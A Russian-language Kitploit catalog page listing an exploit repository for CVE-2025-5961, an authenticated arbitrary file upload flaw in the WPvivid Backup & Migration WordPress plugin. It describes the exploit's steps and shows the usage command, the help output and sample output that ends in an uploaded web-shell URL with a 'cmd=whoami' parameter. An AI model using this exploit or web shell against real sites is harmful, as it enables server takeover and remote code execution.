Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5961 — Миграция, Резервное копирование, Развертывание – WPvivid Backup & Migration <= 0.9.116 - Аутентифицированный (Администратор+) Произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-5961
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-5961

CVE-2025-5961

Миграция, Резервное копирование, Развертывание – WPvivid Backup & Migration <= 0.9.116 - Аутентифицированный (Администратор+) Произвольная загрузка файлов

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 Миграция, резервное копирование, Staging – WPvivid Backup & Migration <= 0.9.116 - Аутентифицированная (Администратор+) произвольная загрузка файлов

📈 Эта уязвимость затрагивает плагин с более чем 700 000+ установок


📝 Детали CVE

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (Высокий)
  • Опубликовано: 3 июля 2025 г.

🔍 Описание

Плагин Migration, Backup, Staging – WPvivid Backup & Migration для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов в функции wpvivid_upload_import_files во всех версиях до 0.9.116 включительно.

Это позволяет аутентифицированным злоумышленникам (уровень Администратора и выше) загружать произвольные файлы на сервер, что потенциально позволяет выполнять удаленный код.


🧰 Скрипт

Этот репозиторий содержит эксплойт для CVE-2025-5961, написанный на Python, который:

  • Проверяет версию плагина.
  • Выполняет вход в систему как Администратор.
  • Извлекает необходимый nonce со страницы плагина.
  • Загружает полезную нагрузку веб-шелла.
  • Выводит URL для доступа к шеллу.

🖥️ Пример использования

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ Использование

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 Пример вывода

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ Отказ от ответственности

Этот скрипт предоставляется только для образовательных и исследовательских целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.


✍️ Автор

Khaled Alenazi (Nxploited)
🌐 GitHub

Скачать инструмент